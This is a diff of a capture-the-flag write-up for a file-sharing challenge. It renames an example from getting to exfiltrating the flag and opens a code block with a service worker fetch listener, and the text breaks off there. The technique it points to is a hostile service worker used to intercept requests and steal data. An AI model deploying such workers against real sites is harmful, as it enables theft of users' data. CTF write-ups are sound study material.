xatophi/m0leconfinals2021-filesharing/writeup.md

 # Service worker

-Example of service worker to get the flag
+Example of service worker to exfiltrate the flag

 ```
 self.addEventListener('fetch', (e) => {